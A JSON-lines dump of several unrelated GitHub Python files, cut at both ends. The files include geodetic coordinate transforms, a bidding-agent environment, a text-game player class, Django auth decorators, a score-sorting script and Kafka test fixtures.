np.zeros((sizeq,1),float)\n scartiqx = np.zeros((sizeq,1),float)\n scartiqy = np.zeros((sizeq,1),float)\n sqm = np.zeros((sizeq,1),float)\n for i in np.arange(sizeq):\n Vx = E0 + LX[i,0] * C[2,0] + LX[i,1] * C[3,0] - sqx[i,0]\n Vy = N0 + LX[i,1] * C[2,0] - LX[i,0] * C[3,0] - sqy[i,0]\n sqmr = math.sqrt(Vx**2 + Vy**2)\n sqm[i,:] = sqmr\n scartiqx[i,0] = Vx**2\n scartiqy[i,0] = Vy**2\n scartix[i,0] = Vx\n scartiy[i,0] = Vy\n scartiq = np.concatenate((scartiqx,scartiqy))\n scarti = np.concatenate((scartix,scartiy))\n scartixy = np.concatenate((scartiqx,scartiqy),1)\n scartiqxy = np.concatenate((scartix,scartiy),1)\n sumscarti = sum(scartiq)\n varqp = sumscarti / ((2 * sizeq) - 4)\n varp = math.sqrt(varqp)\n varianzaq = varqp * linalg.inv(N)\n varianza = varp * linalg.inv(N)\n varqunitp = np.diag(varianzaq)\n varunitp = np.diag(varianza)\n prec = np.zeros((sq,2),float)\n for i in np.arange(sq):\n xx = math.sqrt((LX[i,0]**2) * (varqunitp[2]) + (LX[i,1]**2) * (varqunitp[3]) + varqunitp[0])\n yy = math.sqrt((LX[i,1]**2) * (varqunitp[2]) + (LX[i,0]**2) * (varqunitp[3]) + varqunitp[1])\n prec[i,:] = np.hstack((xx,yy))\n errore = np.concatenate((scartixy,scartiqxy,sqm),1)\n np.savetxt(output+str('_precision'), prec)\n np.savetxt(output+str('_error'), errore)\n err_med = sum(sqm) / pq\n a = C[2,0]\n b = C[3,0]\n lamvar = math.sqrt(((((2 * a) / math.sqrt(a**2 + b**2))**2) * varqunitp[2]) + ((((2 * b) / math.sqrt(a**2 + b**2))**2) * varqunitp[3]))\n alphavar = math.sqrt(((((-b / a**2) / (1 + (b / a)**2))**2) * varqunitp[2]) + (((1 / a) / (1 + (b / a)**2))**2 * varqunitp[3])) / (math.pi / 180.)\n results = str('Trasformation Parameters :\\n')\n results += str(\"\\n\")\n results += str('Tx : ')+str(C[0,0])+'\\n'\n results += str('Ty : ')+str(C[1,0])+'\\n'\n results += str('Rigid Rotation : ')+str(alp)+'\\n'\n results += str('Scale Factor : ')+str(lam)+'\\n'\n results += str(\"\\n\")\n results += str('Trasformation Parameters Variance :\\n')\n results += str(\"\\n\")\n results += str('Sigma quadro Rigid Rotation :')+str(alphavar)+'\\n'\n results += str('Sigma quadro Scale Factor:')+str(lamvar)+'\\n'\n results += str(\"\\n\")\n results += str('Results : ')+str(\"\\n\")\n results += str(ENglob)\n results += '\\n'\n results += str('Mean Error : ')+'\\n'\n results += str(err_med)+'\\n'\n results += '\\n'\n results += str('Precision : ')+'\\n'\n results += str(prec)\n results += '\\n'\n results += str('Error : ')+str(\"\\n\")\n results += str(errore)\n results = results.replace('[','').replace(']','')\n if verbose:\n print(results)\n return ENglob\n\ndef affine(gcpD1, gcpD2, knowD1, output, verbose=False):\n L = np.loadtxt(str(gcpD1))\n A = np.zeros((2*L.shape[0],6),float)\n A[ ::2, 2] = 1.0\n A[1::2, 5] = 1.0\n A[ ::2, 0] = L[:,0]\n A[1::2, 4] = L[:,1]\n A[ ::2, 1] = L[:,1]\n A[1::2, 3] = L[:,0]\n G = np.loadtxt(str(gcpD2))\n Y = np.zeros((2*G.shape[0],1),float)\n Y[ ::2, 0] = G[:,0]\n Y[1::2, 0] = G[:,1]\n N = np.dot(A.T.conj(), A)\n T = np.dot(A.T.conj(), Y)\n C = np.dot(linalg.inv(N), T)\n E0 = C[2]\n N0 = C[5]\n LX = np.loadtxt(str(knowD1))\n ss = LX.shape[0]\n ENglob = np.zeros((ss,2),float)\n for i in np.arange(ss):\n E2 = E0+LX[i,0]*C[0]+LX[i,1]*C[1]\n N2 = N0+LX[i,0]*C[3]+LX[i,1]*C[4]\n ENglob[i,:] = np.hstack((E2,N2))\n np.savetxt(output,ENglob)\n sq = LX.shape[0]\n sqx = np.zeros((G.shape[0],1),float)\n sqy = np.zeros((G.shape[0],1),float)\n sqx[ ::1, 0] = G[:,0]\n sqy[::1, 0] = G[:,1]\n sizeq = sqx.shape[0]\n scartix = np.zeros((sizeq,1),float)\n scartiy = np.zeros((sizeq,1),float)\n scartiqx = np.zeros((sizeq,1),float)\n scartiqy = np.zeros((sizeq,1),float)\n sqm = np.zeros((sizeq,1),float)\n for i in np.arange(sizeq):\n Vx = E0 + LX[i,0] * C[0,0] + LX[i,1] * C[1,0] - sqx[i,0]\n Vy = N0 + LX[i,0] * C[3,0] + LX[i,1] * C[4,0] - sqy[i,0]\n sqmr = math.sqrt(Vx**2 + Vy**2)\n sqm[i,:] = sqmr\n scartiqx[i,0] = Vx**2\n scartiqy[i,0] = Vy**2\n scartix[i,0] = Vx\n scartiy[i,0] = Vx\n scartiq = np.concatenate((scartiqx,scartiqy))\n scarti = np.concatenate((scartix,scartiy))\n scartixy = np.concatenate((scartiqx,scartiqy),1)\n scartiqxy = np.concatenate((scartix,scartiy),1)\n sumscarti = sum(scartiq)\n varqp = sumscarti / ((2 * ss) - 4)\n varp = math.sqrt(varqp)\n varianzaq = varqp * linalg.inv(N)\n varianza = varp * linalg.inv(N)\n varqunitp = np.diag(varianzaq)\n varunitp = np.diag(varianza)\n prec = np.zeros((sq,2),float)\n for i in np.arange(sq):\n xx = math.sqrt((LX[i,0]**2) * (varqunitp[0]) + (LX[i,1]**2) * (varqunitp[1]) + varqunitp[2])\n yy = math.sqrt((LX[i,1]**2) * (varqunitp[0]) + (LX[i,0]**2) * (varqunitp[1]) + varqunitp[5])\n prec[i,:] = np.hstack((xx,yy))\n errore = np.concatenate((scartixy,scartiqxy,sqm),1)\n np.savetxt(output+str('_precision'), prec)\n np.savetxt(output+str('_error'), errore)\n err_med = sum(sqm) / sq\t\t\n results = str('Trasformation Parameters :\\n')\n results += str('Tx : ')+str(C[2,0])+'\\n'\n results += str('Ty : ')+str(C[5,0])+'\\n'\n results += str('Rigid Rotation X : ')+str(C[1,0])+'\\n'\n results += str('Rigid Rotation Y : ')+str(C[3,0])+'\\n'\n results += str('Scale Factor X : ')+str(C[0,0])+'\\n'\n results += str('Scale Factor Y : ')+str(C[4,0])+'\\n'\n results += '\\n'\n results += str('Results : ')+'\\n'\n results += str(ENglob)\n results += str(\"\\n\")\n results += str('Mean Error : ')+'\\n'\n results += str(err_med)+'\\n'\n results += '\\n'\n results += str('Precision : ')+'\\n'\n results += str(prec)+'\\n'\n results += '\\n'\n results += str('Error : ')+'\\n'\n results += str(errore)\n results = results.replace('[','').replace(']','')\n if verbose:\n print(results)\n return ENglob\n\ndef vcross(v):\n x, y, z = v\n mat = np.zeros((3,3))\n mat[0] = [ 0, -z, y]\n mat[1] = [ z, 0, -x]\n mat[2] = [-y, x, 0]\n return mat\n \n\ndef block(v):\n return np.hstack((np.eye(3), -vcross(v), v[:, np.newaxis]))\n\ndef helmert(gcp1, gcp2, inputf, output, verbose=False):\n pt1 = np.loadtxt(str(gcp1))\n pt2 = np.loadtxt(str(gcp2))\n A = []\n rhs = []\n for i in range(3):\n A.append(block(pt1[i]))\n rhs.append((pt2[i] - pt1[i])[:, np.newaxis])\n A = np.vstack(A)\n rhs = np.vstack(rhs)\n sol = np.linalg.lstsq(A, rhs)[0]\n res = rhs - np.dot(A, sol)\n XYZ = np.loadtxt(str(inputf))\n XYZsize = XYZ.shape[0]\n ENZglob = np.zeros((XYZsize,3),float)\n for i in np.arange(XYZsize):\n X = sol[0] + (1 + sol[6]) * ( XYZ[i,0] - sol[5] * XYZ[i,1] + sol[4] * XYZ[i,2] ) \n Y = sol[1] + (1 + sol[6]) * ( sol[5] * XYZ[i,0] + XYZ[i,1] - sol[3] * XYZ[i,2] ) \n Z = sol[2] + (1 + sol[6]) * ( -sol[4] * XYZ[i,0] + sol[3] * XYZ[i,1] + XYZ[i,2] ) \n ENZglob[i,:] = np.hstack((X,Y,Z))\n np.savetxt(output,ENZglob)\n hresults = str('Trasformation Parameters :\\n')\n hresults += str(\"\\n\")\n hresults = str('Traslation :\\n')\n hresults += str(\"\\n\")\n hresults += str('Tx : ')+str(sol[0])+'\\n'\n hresults += str('Ty : ')+str(sol[1])+'\\n'\n hresults += str('Tz : ')+str(sol[2])+'\\n'\n hresults += str(\"\\n\")\n hresults += str('Rotation :\\n ')\n hresults += str(\"\\n\")\n hresults += str('Rx : ')+str(sol[3])+'\\n'\n hresults += str('Ry : ')+str(sol[4])+'\\n'\n hresults += str('Rz : ')+str(sol[5])+'\\n'\n hresults += str(\"\\n\")\n hresults += str('Scale Factor :\\n ')\n hresults += str(\"\\n\")\n hresults += str(\"S : \")+str(sol[6])+'\\n'\n hresults += str(\"\\n\")\n hresults += str('Trasformation Residuals :\\n')\n hresults += str(\"\\n\")\n hresults += str(res)+'\\n'\n hresults += str('Results : \\n')\n hresults += str(\"\\n\")\n hresults += str(ENZglob)\n hresults += '\\n'\n hresults = hresults.replace('[','').replace(']','')\n if verbose:\n print(hresults)\n return ENZglob","repo_name":"epifanio/OSGeospatial-Notebooks","sub_path":"GSoC-2015/Numerical Cartography/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":9311,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"99"} +{"seq_id":"13768087094","text":"import sys\n\nsys.path.append('../Code/')\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom collections import namedtuple\nfrom utils import new_performance\nimport time\n\nbeginning_time = time.time()\nimport os\n\nDATA_DIR = os.path.join('../', 'Data')\nimport pandas as pd\n\nnp.set_printoptions(precision=3, suppress=1)\nplt.style.use('seaborn-notebook')\n\n\ndef timtime(t):\n print(\">\", int(time.time() - t), \"seconds elapsed\")\n\n\n# implement budget on the agent, initalise to 6250*1000\n\n# @title FeatureGrid\nclass FeatureGrid(object):\n\n def __init__(self, feats, true_y, impression_values, verbose=False, discount=1.0, update_thresh=1e5,\n budget=6250 * 1000):\n\n self._start_state = (0)\n self._state = self._start_state\n self._number_of_states = feats.shape[0]\n self._discount = discount\n self.features = feats\n self.num_feats = feats.shape[1]\n self.true_y = true_y\n self.lambd_0 = (1.0 / 75275.275275)\n self.lambd = (1.0 / 75275.275275)\n self.impression_values = impression_values\n self.fullbudget = budget\n self.budget = budget\n self.verbose = verbose\n self.all_actions = [-0.5, -0.15, -0.08, 0, 0.08, 0.15, 0.5]\n self.update_thresh = update_thresh\n self.totalreward = 0\n self.totalr_regularizer = 159\n\n def reset_budget(self):\n self.budget = self.fullbudget\n\n def step(self, action_int):\n\n # need to return reward,discount,nextstate, won_bid\n action = self.all_actions[int(action_int)]\n # if (self._state % self.update_thresh)==0: maybe do not need this to control lambda\n\n self.lambd = (self.lambd_0 + self.lambd_0 * action) # lambda adjustment\n\n bid = (self.impression_values[self._state] / self.lambd)\n pay = self.true_y.payprice[self._state]\n\n if (bid <= self.budget) and (bid > 0):\n\n if pay < bid:\n\n won_bid = 1\n\n elif pay == bid: # if bid=bidprice then we pick randomly\n\n won_bid = np.random.randint(2)\n\n else:\n\n won_bid = 0\n\n if won_bid:\n self.budget = self.budget - pay # update budget consumption feature\n r = self.impression_values[self._state]\n\n else:\n r = 0\n\n else:\n r = 0\n won_bid = 0\n\n self.features[self._state + 1, -3] = (self.budget / self.fullbudget) # update budget left feature\n self.totalreward += (r * 1.0 / self.totalr_regularizer * 1.0) # update total reward/ total achievable reward\n self.features[self._state + 1, -2] = self.totalreward * 1.0 # update total reward\n\n self.features[self._state + 1, -1] = (\n self._number_of_states * 1.0 - self._state * 1.0) / self._number_of_states * 1.0 # total time left ratio\n\n # if (self._state%100000)==0:\n # print(\"budget left\",self.features[self._state+1,-3])\n # print(\"total r\",self.totalreward)\n # print(\"time left\",self.features[self._state+1,-1])\n # print(\"LAMBDA IS: \",self.lambd,\" ACTION WAS: \",action)\n\n next_s = self.features[self._state + 1, :]\n self._state += 1\n discount = 1\n if self.verbose:\n print(\"your bid was: \", bid, \" and won_bid is =\", won_bid)\n print(\"you paid: \", pay)\n print(\"state is: \", self._state)\n print(\"budget is: \", self.budget)\n print('total reward is', self.totalreward)\n\n clicks = self.true_y.click[self._state] * won_bid # if you got a click or not\n\n return r, discount, next_s, won_bid, clicks\n\n def get_obs(self):\n\n return self.features[self._state, :]\n\n def int_to_features(self, int_state):\n return self.features[int_state, :]\n\n def number_of_features(self):\n return self.num_feats\n\n def number_of_actions(self):\n return 7\n\n\nif __name__ == \"__main__\":\n\n train_X = np.load('./train_X.npy')\n train_y = np.load('./train_y.pkl')\n test = False\n model = False\n\n if test:\n # Test you can retrieve features\n\n feats = np.ones((10, 10))\n lables = np.ones((10,))\n impression_vals = np.linspace(0.1, 0.5, 10)\n # Instantiate the non tabular version of the environment.\n feat_grid = FeatureGrid(feats, lables, impression_vals)\n print(\"get features is:\", feat_grid.int_to_features(1))\n print(\"get number of features is:\", feat_grid.number_of_features())\n print(\"get number of actions is:\", feat_grid.number_of_actions())\n pass\n\n # advanced testing - step function\n if model:\n import pickle\n pf = \"../Models/tim_xgb_click.pkl\"\n with open(pf, 'rb') as file:\n GBDT = pickle.load(file)\n train_X2 = np.load('./train_X2.npy')\n impression_values = GBDT.predict(train_X2)\n else:\n impression_values = np.linspace(0.1, 0.5, 10) # TANYAS temp fix to emulate the result from XGBOOST\n\n feat_grid = FeatureGrid(train_X, train_y, impression_values, verbose=True)\n print(\"######################\")\n print(\"###########TEST1###########\")\n print(\"step output is:\", len(feat_grid.step(-0.5)))\n print(\"######################\")\n print(\"###########TEST2###########\")\n print(\"reward output is:\", feat_grid.step(-0.5)[0])\n print(\"######################\")\n print(\"###########TEST3###########\")\n print(\"discount output is:\", feat_grid.step(-0.5)[1])\n print(\"######################\")\n print(\"###########TEST4###########\")\n\n print(\"next_s output is:\", feat_grid.step(-0.5)[2].shape)\n\n pass\n","repo_name":"triptease/uclwe-rtb-clone","sub_path":"i-ACR/CFeatureGrid.py","file_name":"CFeatureGrid.py","file_ext":"py","file_size_in_byte":5738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11191793344","text":"\n\n### Player Setup ###\nclass Player:\n def __init__(self, zonemap):\n self.name = ''\n self.triangle = ''\n self.hp = 0\n self.mp = 0\n self.status_effects = []\n self.location = 'Swamp Swimming Hole' ## Also known as 'address' ##\n self.game_over = False \n self._teleport = False \n self._keys = False\n self._zm = zonemap\n \n \n def reset_hp_mp(self):\n if self.triangle == 'scalene':\n self.hp = 120\n self.mp = 40\n elif self.triangle == 'equilateral':\n self.hp = 40\n self.mp = 120\n elif self.triangle == 'isosceles':\n self.hp = 80\n self.mp = 80\n\n def print_location(self):\n address = self.location\n room = self._zm[address]\n print (\"\")\n print (\"#\"*(4 + len(address)))\n print (\"# \" + address.upper() + \" #\")\n print (\"# \"+ room['description'].replace('\\n', '') + \" #\")\n print (\"#\"*(4 + len(address)) )\n\n def player_look(self):\n address = self.location\n room = self._zm[address]\n print (\"\")\n print (\"#\"*(4 + len(address)))\n print (\"# \" + address.upper() + \" #\")\n print (\"# \"+ room['look'].replace('\\n', '') + \" #\")\n print (\"#\"*(4 + len(address)) )\n\n def player_glance(self):\n address = self.location\n room = self._zm[address]\n print (\"\")\n print (\"#\"*(4 + len(address)))\n print (\"# \" + address.upper() + \" #\")\n print (\"# \"+ room['glance'].replace('\\n', '') + \" #\")\n print (\"#\"*(4 + len(address)) )\n\n \n\n def can_teleport(self):\n return self._teleport\n\n def has_keys(self):\n return self._keys","repo_name":"ExerciseAndrew/Marshwallow","sub_path":"src/Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74819682244","text":"# _*_coding:utf-8_*_\r\nimport re\r\n\r\nfrom django.http import HttpResponseRedirect, HttpResponse\r\n\r\nfrom common.cache_helper import get_mc\r\nfrom conf.memcachedconf import TOKEN_PREFIX\r\nfrom conf.sessionconf import SESSION_LOGIN\r\n\r\n\r\n__author__ = 'Administrator'\r\n\r\n\r\ndef login_required(func):\r\n \"\"\"\r\n 登录装饰器,用于判断是否登录\r\n :param func:\r\n :return:\r\n \"\"\"\r\n\r\n def wrap(request, **kwargs):\r\n ilog = SESSION_LOGIN in request.session\r\n if ilog:\r\n return func(request, **kwargs)\r\n else:\r\n # 登录成功后重定向到请求的URI\r\n rori = request.META.get('REQUEST_URI', '/freezer/')\r\n return HttpResponseRedirect('/freezer/login?uri=' + rori)\r\n\r\n return wrap\r\n\r\n\r\ndef token_required(func):\r\n \"\"\"\r\n api token值判断\r\n :param func:\r\n :return:\r\n \"\"\"\r\n\r\n def wrap(request, **kwargs):\r\n token = request.REQUEST.get(\"token\", None)\r\n response = HttpResponse()\r\n if token:\r\n # 检查token值是否过期\r\n if re.match(\"^\" + TOKEN_PREFIX + \"[0-9\\-a-zA-Z]+$\", token):\r\n mc = get_mc()\r\n val = mc.get(str(token))\r\n if val:\r\n # 对网页进行处理(后期要根据token值进行权限控制)\r\n # request.REQUEST[\"username\"] = val\r\n return func(request, val, **kwargs)\r\n # return func(request, **kwargs)\r\n else:\r\n response.status_code = 401\r\n response.reason_phrase = \"token timeout\"\r\n else:\r\n response.status_code = 401\r\n response.reason_phrase = \"invalid token\"\r\n else:\r\n # 说明没有传递token值过来\r\n response.status_code = 401\r\n response.reason_phrase = \"unauthorized\"\r\n return response\r\n\r\n return wrap","repo_name":"cherrishes/weilai","sub_path":"xingxing/util/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"29361185837","text":"studentScore = {'Alice': 99, \"Bob\": 97, \"Carol\": 96, \"Dave\": 100}\r\n\r\n\r\ndef sortNameSequence(studentScore):\r\n for name, score in sorted(studentScore.items()):\r\n print(\"%s,%s\" % (name, score))\r\n\r\n\r\ndef sortNameInverse(studentScore):\r\n for name, score in sorted(studentScore.items(), reverse=True):\r\n print(\"%s,%s\" % (name, score))\r\n\r\n\r\ndef sortScoreSequence(studentScore):\r\n studentScore2 = {(score, name): score for name, score in studentScore.items()}\r\n for (score, name), score in sorted(studentScore2.items()):\r\n print(\"%s,%s\" % (name, score))\r\n\r\n\r\ndef sortScoreInverse(studentScore):\r\n studentScore2 = {(score, name): score for name, score in studentScore.items()}\r\n for (score, name), score in sorted(studentScore2.items(), reverse=True):\r\n print(\"%s,%s\" % (name, score))\r\n\r\n\r\noperationInformation = \"\"\"\r\n1. Sort by name in lexicographical order.\r\n2. Sort by name in reverse lexicographical order.\r\n3. Sort by score from small to large.\r\n4. Sort by score from large to small.\r\nq. Quit the program.\r\n\"\"\"\r\n\r\nwhile True:\r\n opt = input(operationInformation)\r\n if opt == \"1\":\r\n sortNameSequence(studentScore)\r\n elif opt == \"2\":\r\n sortNameInverse(studentScore)\r\n elif opt == \"3\":\r\n sortScoreSequence(studentScore)\r\n elif opt == \"4\":\r\n sortScoreInverse(studentScore)\r\n elif opt.lower() == \"q\":\r\n print(\"Sayonara\")\r\n break\r\n else:\r\n print(\"Invalid command\")\r\n","repo_name":"krydom/Tsinghua_Programming_Homework","sub_path":"Python Programming/week2/week2.py","file_name":"week2.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"36577293822","text":"from __future__ import absolute_import\n\nimport atexit\nimport logging\nimport os\nimport os.path\nimport shutil\nimport subprocess\nimport tempfile\nimport time\nimport uuid\n\nfrom six.moves import urllib\nfrom six.moves.urllib.parse import urlparse # pylint: disable=E0611,F0401\n\nfrom test.service import ExternalService, SpawnedService\nfrom test.testutil import get_open_port\n\n\nlog = logging.getLogger(__name__)\n\n\nclass Fixture(object):\n kafka_version = os.environ.get('KAFKA_VERSION', '0.8.0')\n scala_version = os.environ.get(\"SCALA_VERSION\", '2.8.0')\n project_root = os.environ.get('PROJECT_ROOT', os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\")))\n kafka_root = os.environ.get(\"KAFKA_ROOT\", os.path.join(project_root, 'servers', kafka_version, \"kafka-bin\"))\n ivy_root = os.environ.get('IVY_ROOT', os.path.expanduser(\"~/.ivy2/cache\"))\n\n @classmethod\n def download_official_distribution(cls,\n kafka_version=None,\n scala_version=None,\n output_dir=None):\n if not kafka_version:\n kafka_version = cls.kafka_version\n if not scala_version:\n scala_version = cls.scala_version\n if not output_dir:\n output_dir = os.path.join(cls.project_root, 'servers', 'dist')\n\n distfile = 'kafka_%s-%s' % (scala_version, kafka_version,)\n url_base = 'https://archive.apache.org/dist/kafka/%s/' % (kafka_version,)\n output_file = os.path.join(output_dir, distfile + '.tgz')\n\n if os.path.isfile(output_file):\n log.info(\"Found file already on disk: %s\", output_file)\n return output_file\n\n # New tarballs are .tgz, older ones are sometimes .tar.gz\n try:\n url = url_base + distfile + '.tgz'\n log.info(\"Attempting to download %s\", url)\n response = urllib.request.urlopen(url)\n except urllib.error.HTTPError:\n log.exception(\"HTTP Error\")\n url = url_base + distfile + '.tar.gz'\n log.info(\"Attempting to download %s\", url)\n response = urllib.request.urlopen(url)\n\n log.info(\"Saving distribution file to %s\", output_file)\n with open(output_file, 'w') as output_file_fd:\n output_file_fd.write(response.read())\n\n return output_file\n\n @classmethod\n def test_resource(cls, filename):\n return os.path.join(cls.project_root, \"servers\", cls.kafka_version, \"resources\", filename)\n\n @classmethod\n def kafka_run_class_args(cls, *args):\n result = [os.path.join(cls.kafka_root, 'bin', 'kafka-run-class.sh')]\n result.extend(args)\n return result\n\n def kafka_run_class_env(self):\n env = os.environ.copy()\n env['KAFKA_LOG4J_OPTS'] = \"-Dlog4j.configuration=file:%s\" % self.test_resource(\"log4j.properties\")\n return env\n\n @classmethod\n def render_template(cls, source_file, target_file, binding):\n log.info('Rendering %s from template %s', target_file, source_file)\n with open(source_file, \"r\") as handle:\n template = handle.read()\n assert len(template) > 0, 'Empty template %s' % source_file\n with open(target_file, \"w\") as handle:\n handle.write(template.format(**binding))\n handle.flush()\n os.fsync(handle)\n\n # fsync directory for durability\n # https://blog.gocept.com/2013/07/15/reliable-file-updates-with-python/\n dirfd = os.open(os.path.dirname(target_file), os.O_DIRECTORY)\n os.fsync(dirfd)\n os.close(dirfd)\n\n\nclass ZookeeperFixture(Fixture):\n @classmethod\n def instance(cls):\n if \"ZOOKEEPER_URI\" in os.environ:\n parse = urlparse(os.environ[\"ZOOKEEPER_URI\"])\n (host, port) = (parse.hostname, parse.port)\n fixture = ExternalService(host, port)\n else:\n (host, port) = (\"127.0.0.1\", None)\n fixture = cls(host, port)\n\n fixture.open()\n return fixture\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n\n self.tmp_dir = None\n self.child = None\n\n def kafka_run_class_env(self):\n env = super(ZookeeperFixture, self).kafka_run_class_env()\n env['LOG_DIR'] = os.path.join(self.tmp_dir, 'logs')\n return env\n\n def out(self, message):\n log.info(\"*** Zookeeper [%s:%s]: %s\", self.host, self.port or '(auto)', message)\n\n def open(self):\n self.tmp_dir = tempfile.mkdtemp()\n self.out(\"Running local instance...\")\n log.info(\" host = %s\", self.host)\n log.info(\" port = %s\", self.port or '(auto)')\n log.info(\" tmp_dir = %s\", self.tmp_dir)\n\n # Configure Zookeeper child process\n template = self.test_resource(\"zookeeper.properties\")\n properties = os.path.join(self.tmp_dir, \"zookeeper.properties\")\n args = self.kafka_run_class_args(\"org.apache.zookeeper.server.quorum.QuorumPeerMain\", properties)\n env = self.kafka_run_class_env()\n\n # Party!\n timeout = 5\n max_timeout = 30\n backoff = 1\n end_at = time.time() + max_timeout\n tries = 1\n auto_port = (self.port is None)\n while time.time() < end_at:\n if auto_port:\n self.port = get_open_port()\n self.out('Attempting to start on port %d (try #%d)' % (self.port, tries))\n self.render_template(template, properties, vars(self))\n self.child = SpawnedService(args, env)\n self.child.start()\n timeout = min(timeout, max(end_at - time.time(), 0))\n if self.child.wait_for(r\"binding to port\", timeout=timeout):\n break\n self.child.dump_logs()\n self.child.stop()\n timeout *= 2\n time.sleep(backoff)\n tries += 1\n else:\n raise Exception('Failed to start Zookeeper before max_timeout')\n self.out(\"Done!\")\n atexit.register(self.close)\n\n def close(self):\n if self.child is None:\n return\n self.out(\"Stopping...\")\n self.child.stop()\n self.child = None\n self.out(\"Done!\")\n shutil.rmtree(self.tmp_dir)\n\n def __del__(self):\n self.close()\n\n\nclass KafkaFixture(Fixture):\n @classmethod\n def instance(cls, broker_id, zk_host, zk_port, zk_chroot=None,\n host=None, port=None,\n transport='PLAINTEXT', replicas=1, partitions=2):\n if zk_chroot is None:\n zk_chroot = \"kafka-python_\" + str(uuid.uuid4()).replace(\"-\", \"_\")\n if \"KAFKA_URI\" in os.environ:\n parse = urlparse(os.environ[\"KAFKA_URI\"])\n (host, port) = (parse.hostname, parse.port)\n fixture = ExternalService(host, port)\n else:\n # force IPv6 here because of a confusing point:\n #\n # - if the string \"localhost\" is passed, Kafka will *only* bind to the IPv4 address of localhost\n # (127.0.0.1); however, kafka-python will attempt to connect on ::1 and fail\n #\n # - if the address literal 127.0.0.1 is passed, the metadata request during bootstrap will return\n # the name \"localhost\" and we'll go back to the first case. This is odd!\n #\n # Ideally, Kafka would bind to all loopback addresses when we tell it to listen on \"localhost\" the\n # way it makes an IPv6 socket bound to both 0.0.0.0/0 and ::/0 when we tell it to bind to \"\" (that is\n # to say, when we make a listener of PLAINTEXT://:port.\n #\n # Note that even though we specify the bind host in bracket notation, Kafka responds to the bootstrap\n # metadata request without square brackets later.\n if host is None:\n host = \"[::1]\"\n fixture = KafkaFixture(host, port, broker_id,\n zk_host, zk_port, zk_chroot,\n transport=transport,\n replicas=replicas, partitions=partitions)\n fixture.open()\n return fixture\n\n def __init__(self, host, port, broker_id, zk_host, zk_port, zk_chroot,\n replicas=1, partitions=2, transport='PLAINTEXT'):\n self.host = host\n self.port = port\n\n self.broker_id = broker_id\n self.transport = transport.upper()\n self.ssl_dir = self.test_resource('ssl')\n\n self.zk_host = zk_host\n self.zk_port = zk_port\n self.zk_chroot = zk_chroot\n\n self.replicas = replicas\n self.partitions = partitions\n\n self.tmp_dir = None\n self.child = None\n self.running = False\n\n def kafka_run_class_env(self):\n env = super(KafkaFixture, self).kafka_run_class_env()\n env['LOG_DIR'] = os.path.join(self.tmp_dir, 'logs')\n return env\n\n def out(self, message):\n log.info(\"*** Kafka [%s:%s]: %s\", self.host, self.port or '(auto)', message)\n\n def open(self):\n if self.running:\n self.out(\"Instance already running\")\n return\n\n self.tmp_dir = tempfile.mkdtemp()\n self.out(\"Running local instance...\")\n log.info(\" host = %s\", self.host)\n log.info(\" port = %s\", self.port or '(auto)')\n log.info(\" transport = %s\", self.transport)\n log.info(\" broker_id = %s\", self.broker_id)\n log.info(\" zk_host = %s\", self.zk_host)\n log.info(\" zk_port = %s\", self.zk_port)\n log.info(\" zk_chroot = %s\", self.zk_chroot)\n log.info(\" replicas = %s\", self.replicas)\n log.info(\" partitions = %s\", self.partitions)\n log.info(\" tmp_dir = %s\", self.tmp_dir)\n\n # Create directories\n os.mkdir(os.path.join(self.tmp_dir, \"logs\"))\n os.mkdir(os.path.join(self.tmp_dir, \"data\"))\n\n self.out(\"Creating Zookeeper chroot node...\")\n args = self.kafka_run_class_args(\"org.apache.zookeeper.ZooKeeperMain\",\n \"-server\", \"%s:%d\" % (self.zk_host, self.zk_port),\n \"create\",\n \"/%s\" % self.zk_chroot,\n \"kafka-python\")\n env = self.kafka_run_class_env()\n proc = subprocess.Popen(args, env=env, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n if proc.wait() != 0:\n self.out(\"Failed to create Zookeeper chroot node\")\n self.out(proc.stdout.read())\n self.out(proc.stderr.read())\n raise RuntimeError(\"Failed to create Zookeeper chroot node\")\n self.out(\"Done!\")\n\n # Configure Kafka child process\n properties = os.path.join(self.tmp_dir, \"kafka.properties\")\n template = self.test_resource(\"kafka.properties\")\n args = self.kafka_run_class_args(\"kafka.Kafka\", properties)\n env = self.kafka_run_class_env()\n\n timeout = 5\n max_timeout = 30\n backoff = 1\n end_at = time.time() + max_timeout\n tries = 1\n auto_port = (self.port is None)\n while time.time() < end_at:\n # We have had problems with port conflicts on travis\n # so we will try a different port on each retry\n # unless the fixture was passed a specific port\n if auto_port:\n self.port = get_open_port()\n self.out('Attempting to start on port %d (try #%d)' % (self.port, tries))\n self.render_template(template, properties, vars(self))\n self.child = SpawnedService(args, env)\n self.child.start()\n timeout = min(timeout, max(end_at - time.time(), 0))\n if self.child.wait_for(r\"\\[Kafka Server %d\\], Started\" %\n self.broker_id, timeout=timeout):\n break\n self.child.dump_logs()\n self.child.stop()\n timeout *= 2\n time.sleep(backoff)\n tries += 1\n else:\n raise Exception('Failed to start KafkaInstance before max_timeout')\n self.out(\"Done!\")\n self.running = True\n atexit.register(self.close)\n\n def __del__(self):\n self.close()\n\n def close(self):\n if not self.running:\n self.out(\"Instance already stopped\")\n return\n\n self.out(\"Stopping...\")\n self.child.stop()\n self.child = None\n self.out(\"Done!\")\n shutil.rmtree(self.tmp_dir)\n self.running = False\n","repo_name":"openstack-archive/deb-python-kafka","sub_path":"test/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":12623,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"99"} +{"seq_id":"34742474388","text":"N = int(input())\n\nnums = list(map(int, input().split()))\ncount = 0\ndef eratosthenes(num: int) -> bool: # 함수이름은 그냥 임시로 지은거임..\n for i in range(2, num-1):\n if num % i == 0:\n return False\n return True\n\nfor n in 